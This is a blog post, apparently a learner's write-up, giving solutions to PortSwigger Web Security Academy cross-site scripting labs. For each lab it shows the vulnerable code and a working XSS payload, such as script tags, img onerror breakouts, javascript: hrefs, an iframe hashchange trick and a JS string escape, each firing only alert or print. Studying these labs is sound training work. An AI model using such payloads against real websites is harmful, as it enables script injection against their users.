<!DOCTYPE html>
<html lang="en-gb"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Portswigger XSS Lab Part 1 | Sairas ko website</title>
<meta property="og:title" content="Portswigger XSS Lab Part 1 | Sairas ko website" />
<meta name="twitter:title" content="Portswigger XSS Lab Part 1 | Sairas ko website" />
<meta itemprop="name" content="Portswigger XSS Lab Part 1 | Sairas ko website" />
<meta name="application-name" content="Portswigger XSS Lab Part 1 | Sairas ko website" />
<meta property="og:site_name" content="Sairas ko Blogs" />

<meta name="description" content="A place where Sairas posts Blogs &amp; stuff">
<meta itemprop="description" content="A place where Sairas posts Blogs &amp; stuff" />
<meta property="og:description" content="A place where Sairas posts Blogs &amp; stuff" />
<meta name="twitter:description" content="A place where Sairas posts Blogs &amp; stuff" />

<meta property="og:locale" content="en-gb" />
<meta name="language" content="en-gb" />

  <link rel="alternate" hreflang="en-gb" href="https://sairas.tech/posts/portswigger-xss-lab-part-1/" title="English" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2024-12-18T21:07:00&#43;0545 />
    <meta property="article:published_time" content=2024-12-18T21:07:00&#43;0545 />
    <meta property="og:url" content="https://sairas.tech/posts/portswigger-xss-lab-part-1/" />

    
    <meta property="og:article:author" content="Sairas" />
    <meta property="article:author" content="Sairas" />
    <meta name="author" content="Sairas" />
    
    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Portswigger XSS Lab Part 1",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2024-12-18",
        "description": "",
        "wordCount":  564 ,
        "mainEntityOfPage": "True",
        "dateModified": "2024-12-18",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Sairas ko website"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.123.7">

    
    <meta property="og:title" content="Portswigger XSS Lab Part 1" />
<meta property="og:description" content="Reflected XSS into HTML context with nothing encoded Solution: &lt;script&gt;alert(1)&lt;/script&gt;
Explaination: &lt;section class=blog-header&gt; &lt;h1&gt;0 search results for &#39;abc123&#39;&lt;/h1&gt; &lt;hr&gt;| &lt;/section&gt; *The vulnerable parameter here is the h1 tag as it can run scripts inside of it so when we search &lt;script&gt;alert(1)&lt;/script&gt; instead of abc123 the htm code becomes
&lt;section class=blog-header&gt; &lt;h1&gt;0 search results for &#39;&lt;script&gt;alert(1)&lt;/script&gt;&#39;&lt;/h1&gt; &lt;hr&gt; &lt;/section&gt; and it will end up executing the alert script.
Stored XSS into HTML context with nothing encoded Solution: &lt;p&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/p&gt;" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://sairas.tech/posts/portswigger-xss-lab-part-1/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2024-12-18T21:07:00+05:45" />
<meta property="article:modified_time" content="2024-12-18T21:07:00+05:45" />



    
    <meta name="twitter:card" content="summary"/><meta name="twitter:title" content="Portswigger XSS Lab Part 1"/>
<meta name="twitter:description" content="Reflected XSS into HTML context with nothing encoded Solution: &lt;script&gt;alert(1)&lt;/script&gt;
Explaination: &lt;section class=blog-header&gt; &lt;h1&gt;0 search results for &#39;abc123&#39;&lt;/h1&gt; &lt;hr&gt;| &lt;/section&gt; *The vulnerable parameter here is the h1 tag as it can run scripts inside of it so when we search &lt;script&gt;alert(1)&lt;/script&gt; instead of abc123 the htm code becomes
&lt;section class=blog-header&gt; &lt;h1&gt;0 search results for &#39;&lt;script&gt;alert(1)&lt;/script&gt;&#39;&lt;/h1&gt; &lt;hr&gt; &lt;/section&gt; and it will end up executing the alert script.
Stored XSS into HTML context with nothing encoded Solution: &lt;p&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/p&gt;"/>


    

    <link rel="canonical" href="https://sairas.tech/posts/portswigger-xss-lab-part-1/">
    <link href="/style.min.2d921c18cf1ec555ffc03d59a8adc211c402c68c930c27d6a0c306ab175a8d09.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://sairas.tech/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
    
</head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://sairas.tech/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/about/">
                        About
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Portswigger XSS Lab Part 1</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2024-12-18T21:07:00&#43;05:45" itemprop="datePublished"> 18 Dec 2024 </time>
                </div>
                
            </header>
            
    
    <details class="toc" ZgotmplZ>
        <summary><b>Table of Contents</b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#reflected-xss-into-html-context-with-nothing-encoded">Reflected XSS into HTML context with nothing encoded</a>
      <ul>
        <li>
          <ul>
            <li><a href="#solution">Solution:</a></li>
            <li><a href="#explaination">Explaination:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#stored-xss-into-html-context-with-nothing-encoded">Stored XSS into HTML context with nothing encoded</a>
      <ul>
        <li>
          <ul>
            <li><a href="#solution-1">Solution:</a></li>
            <li><a href="#explaination-1">Explaination:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#dom-xss-indocumentwritesink-using-sourcelocationsearch">DOM XSS in <code>document.write</code> sink using source <code>location.search</code></a>
      <ul>
        <li>
          <ul>
            <li><a href="#vulnerable-parameter">Vulnerable parameter:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#solution-2">Solution:</a>
      <ul>
        <li>
          <ul>
            <li><a href="#explaination-2">Explaination:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#dom-xss-ininnerhtmlsink-using-sourcelocationsearch">DOM XSS in <code>innerHTML</code> sink using source <code>location.search</code></a>
      <ul>
        <li>
          <ul>
            <li><a href="#vulnerable-parameter-1">Vulnerable parameter:</a></li>
            <li><a href="#solution-3">Solution:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#explaination-3">Explaination:</a></li>
    <li><a href="#dom-xss-in-jquery-anchorhrefattribute-sink-usinglocationsearchsource">DOM XSS in jQuery anchor <code>href</code> attribute sink using <code>location.search</code> source</a>
      <ul>
        <li>
          <ul>
            <li><a href="#vulnerable-parameter-2">Vulnerable parameter:</a></li>
          </ul>
        </li>
        <li><a href="#solution-4">Solution:</a>
          <ul>
            <li><a href="#explanation">Explanation:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#dom-xss-in-jquery-selector-sink-using-a-hashchange-event">DOM XSS in jQuery selector sink using a hashchange event</a>
      <ul>
        <li>
          <ul>
            <li><a href="#vulnerable-code-">Vulnerable code :</a></li>
            <li><a href="#solution-5">Solution:</a></li>
            <li><a href="#explanation-1">Explanation:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#reflected-xss-into-attribute-with-angle-brackets-html-encoded">Reflected XSS into attribute with angle brackets HTML-encoded</a>
      <ul>
        <li>
          <ul>
            <li><a href="#vulnerable-parameter-3">Vulnerable parameter:</a></li>
            <li><a href="#solution-6">Solution:</a></li>
            <li><a href="#explanation-2">Explanation:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#stored-xss-into-anchor-href-attribute-with-double-quotes-html-encoded">Stored XSS into anchor <code>href</code> attribute with double quotes HTML-encoded</a>
      <ul>
        <li>
          <ul>
            <li><a href="#vulnerable-parameter-4">Vulnerable parameter:</a></li>
            <li><a href="#solution-7">Solution:</a></li>
            <li><a href="#explanation-3">Explanation:</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#reflected-xss-into-a-javascript-string-with-angle-brackets-html-encoded">Reflected XSS into a JavaScript string with angle brackets HTML encoded</a>
      <ul>
        <li><a href="#vulnerable-parameter-5">Vulnerable parameter:</a>
          <ul>
            <li><a href="#solution-8">Solution:</a></li>
            <li><a href="#explanation-4">Explanation:</a></li>
          </ul>
        </li>
      </ul>
    </li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <h2 id="reflected-xss-into-html-context-with-nothing-encoded">Reflected XSS into HTML context with nothing encoded</h2>
<h4 id="solution">Solution:</h4>
<p><code>&lt;script&gt;alert(1)&lt;/script&gt;</code></p>
<h4 id="explaination">Explaination:</h4>
<pre tabindex="0"><code>&lt;section class=blog-header&gt;
&lt;h1&gt;0 search results for &#39;abc123&#39;&lt;/h1&gt;
&lt;hr&gt;|
&lt;/section&gt;
</code></pre><p>*The vulnerable parameter here is the h1 tag as it can run scripts inside of it so when we search <code>&lt;script&gt;alert(1)&lt;/script&gt;</code> instead of <code>abc123</code> the htm code becomes</p>
<pre tabindex="0"><code>&lt;section class=blog-header&gt;
&lt;h1&gt;0 search results for &#39;&lt;script&gt;alert(1)&lt;/script&gt;&#39;&lt;/h1&gt;
&lt;hr&gt;
&lt;/section&gt;
</code></pre><p>and it will end up executing the alert script.</p>
<h2 id="stored-xss-into-html-context-with-nothing-encoded">Stored XSS into HTML context with nothing encoded</h2>
<h4 id="solution-1">Solution:</h4>
<p><code>&lt;p&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/p&gt;</code></p>
<h4 id="explaination-1">Explaination:</h4>
<p>Whatever we put in the comment section is reflected inside the <code>&lt;p&gt;&lt;/p&gt;</code> so if we just put the script inside it, <code>&lt;p&gt;</code> tag being capable of executing scripts and nothing encoded/filtered, it will execute similar to what happened with h1 tag.</p>
<h2 id="dom-xss-indocumentwritesink-using-sourcelocationsearch">DOM XSS in <code>document.write</code> sink using source <code>location.search</code></h2>
<h4 id="vulnerable-parameter">Vulnerable parameter:</h4>
<p><code>document.write('&lt;img src=&quot;/resources/images/tracker.gif?searchTerms='+query+'&quot;&gt;');</code></p>
<h2 id="solution-2">Solution:</h2>
<p><code>&quot;&gt;&lt;img src=x onerror='alert(1)'/&gt;</code></p>
<h4 id="explaination-2">Explaination:</h4>
<pre tabindex="0"><code>
function trackSearch(query) {
document.write(&#39;&lt;img src=&#34;/resources/images/tracker.gif?searchTerms=&#39;+query+&#39;&#34;&gt;&#39;);
}
var query = (new URLSearchParams(window.location.search)).get(&#39;search&#39;);|
if(query) {|
trackSearch(query);
}
</code></pre><p>As you can see our query is getting in the <code>document.write('&lt;img src=&quot;/resources/images/tracker.gif?searchTerms='+query+'&quot;&gt;');</code> we can break out of the <code>&lt;img&gt;</code> tag and start our own tag as it will be written inside <code>document.write</code> which executes html tags inside it.</p>
<h2 id="dom-xss-ininnerhtmlsink-using-sourcelocationsearch">DOM XSS in <code>innerHTML</code> sink using source <code>location.search</code></h2>
<h4 id="vulnerable-parameter-1">Vulnerable parameter:</h4>
<p><code>document.getElementById('searchMessage').innerHTML = query;</code></p>
<h4 id="solution-3">Solution:</h4>
<p><code>&lt;img src=x onerror='alert(1)'/&gt;</code></p>
<h2 id="explaination-3">Explaination:</h2>
<pre tabindex="0"><code>&lt;script&gt;
function doSearchQuery(query) {
document.getElementById(&#39;searchMessage&#39;).innerHTML = query;
}
var query = (new URLSearchParams(window.location.search)).get(&#39;search&#39;);
if(query) {
doSearchQuery(query);
}
&lt;/script&gt;
</code></pre><p>whatever we put in the search bar, it is accepted as query and as we can see the query is getting embedded using <code>.innerhtml</code> and it also renders html tags, so it will cause an alert.</p>
<h2 id="dom-xss-in-jquery-anchorhrefattribute-sink-usinglocationsearchsource">DOM XSS in jQuery anchor <code>href</code> attribute sink using <code>location.search</code> source</h2>
<h4 id="vulnerable-parameter-2">Vulnerable parameter:</h4>
<p>`</p>
<pre tabindex="0"><code>&lt;script&gt;
$(function() {
$(&#39;#backLink&#39;).attr(&#34;href&#34;, (new URLSearchParams(window.location.search)).get(&#39;returnPath&#39;));
});&lt;/script&gt;
</code></pre><h3 id="solution-4">Solution:</h3>
<p><code>https://0a4300c40409e0a480b1120a00010026.web-security-academy.net/feedback?returnPath=javascript:alert(1)</code></p>
<h4 id="explanation">Explanation:</h4>
<p>The <code>href</code> attribute in the anchor tag is dynamically set using the <code>location.search</code> query parameter, which can be controlled by an attacker. By injecting <code>javascript:alert(1)</code>, the script is executed when the link is clicked.</p>
<h2 id="dom-xss-in-jquery-selector-sink-using-a-hashchange-event">DOM XSS in jQuery selector sink using a hashchange event</h2>
<h4 id="vulnerable-code-">Vulnerable code :</h4>
<pre tabindex="0"><code class="language-<script>" data-lang="<script>">                        $(window).on(&#39;hashchange&#39;, function(){
                            var post = $(&#39;section.blog-list h2:contains(&#39; + decodeURIComponent(window.location.hash.slice(1)) + &#39;)&#39;);
                            if (post) post.get(0).scrollIntoView();
                        });
                    &lt;/script&gt;
</code></pre><h4 id="solution-5">Solution:</h4>
<pre tabindex="0"><code>&lt;iframe src=&#34;https://0a10003a0435886782b60c76001b00a3.web-security-academy.net/#&#34; onload=&#34;this.src+=&#39;&lt;img src=x onerror=print()&gt;&#39;&#34;&gt;&lt;/iframe&gt;
</code></pre><h4 id="explanation-1">Explanation:</h4>
<p>The vulnerable code is running a function which on hashchance takes what&rsquo;s in the hash and adds to h2, which runs the script above when we put script as a change to another fragment.</p>
<h2 id="reflected-xss-into-attribute-with-angle-brackets-html-encoded">Reflected XSS into attribute with angle brackets HTML-encoded</h2>
<h4 id="vulnerable-parameter-3">Vulnerable parameter:</h4>
<pre tabindex="0"><code>&lt;input type=text placeholder=&#39;Search the blog...&#39; name=search value=&#34;abc123&#34;&gt;
</code></pre><h4 id="solution-6">Solution:</h4>
<pre tabindex="0"><code>&#34;onmouseover=&#34;alert(1)
</code></pre><h4 id="explanation-2">Explanation:</h4>
<p>whatever we are putting in the search bar, it&rsquo;s getting reflected in the above vulnerable parameter so we decided to escape by simply breaking out of it, when we put the payload in the vulnerable parameter it becomes something like</p>
<pre tabindex="0"><code>&lt;input type=text placeholder=&#39;Search the blog...&#39; name=search value=&#34;&#34;onmouseover=&#34;alert(1)&#34;&gt;
</code></pre><p>and it&rsquo;ll end up alerting when we mouseover the search bar.</p>
<h2 id="stored-xss-into-anchor-href-attribute-with-double-quotes-html-encoded">Stored XSS into anchor <code>href</code> attribute with double quotes HTML-encoded</h2>
<h4 id="vulnerable-parameter-4">Vulnerable parameter:</h4>
<pre tabindex="0"><code>     &lt;a id=&#34;author&#34; href=&#34;[https://hello.com](view-source:https://hello.com/)&#34;&gt;sairas@gmail.com&lt;/a&gt; | 19 December 2024
</code></pre><h4 id="solution-7">Solution:</h4>
<pre tabindex="0"><code>	javascript:alert(1)
</code></pre><h4 id="explanation-3">Explanation:</h4>
<p>As I&rsquo;ve previously said href can take javascript like <code>href=javascript:alert(1)</code> and run that javascript so it&rsquo;s a bad idea to put user&rsquo;s input directly into href.</p>
<h2 id="reflected-xss-into-a-javascript-string-with-angle-brackets-html-encoded">Reflected XSS into a JavaScript string with angle brackets HTML encoded</h2>
<h3 id="vulnerable-parameter-5">Vulnerable parameter:</h3>
<pre tabindex="0"><code> &lt;script&gt;
                        var searchTerms = &#39;hello123&#39;;
                        document.write(&#39;&lt;img src=&#34;/resources/images/tracker.gif?searchTerms=&#39;+encodeURIComponent(searchTerms)+&#39;&#34;&gt;&#39;);
                    &lt;/script&gt;
</code></pre><h4 id="solution-8">Solution:</h4>
<pre tabindex="0"><code>&#39;;-alert(1)//
</code></pre><h4 id="explanation-4">Explanation:</h4>
<p>As you can already see, we just broke out of the searchTerms variable and called alert and commented extra codes as they could cause some problems</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://www.linkedin.com/in/sairas-shrestha-aaa87531a/" target="_blank" rel="noopener noreferrer me"
    title="Linkedin">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path>
    <rect x="2" y="9" width="4" height="12"></rect>
    <circle cx="4" cy="4" r="2"></circle>
</svg>
</a>
<a href="https://github.com/sairasshrestha" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="https://instagram.com/saerus_stha" target="_blank" rel="noopener noreferrer me"
    title="Instagram">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <rect x="2" y="2" width="20" height="20" rx="5" ry="5"></rect>
    <path d="M16 11.37A4 4 0 1 1 12.63 8 4 4 0 0 1 16 11.37z"></path>
    <line x1="17.5" y1="6.5" x2="17.5" y2="6.5"></line>
</svg>
</a>
<a href="https://x.com/SairasShre9259" target="_blank" rel="noopener noreferrer me"
    title="X">
    <svg viewBox="0 0 1200 1227" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
    <path
        d="M714.163 519.284L1160.89 0H1055.03L667.137 450.887L357.328 0H0L468.492 681.821L0 1226.37H105.866L515.491 750.218L842.672 1226.37H1200L714.137 519.284H714.163ZM569.165 687.828L521.697 619.934L144.011 79.6944H306.615L611.412 515.685L658.88 583.579L1055.08 1150.3H892.476L569.165 687.854V687.828Z"/>
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2024 Sairas.
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer><a href="#" title="Go to top" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    




    
    
        
    

    
    
        
    



    
    <script src="https://sairas.tech/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js" integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30&#43;lSNuSkl4QXuNyy8="></script>

    

</body>
</html>
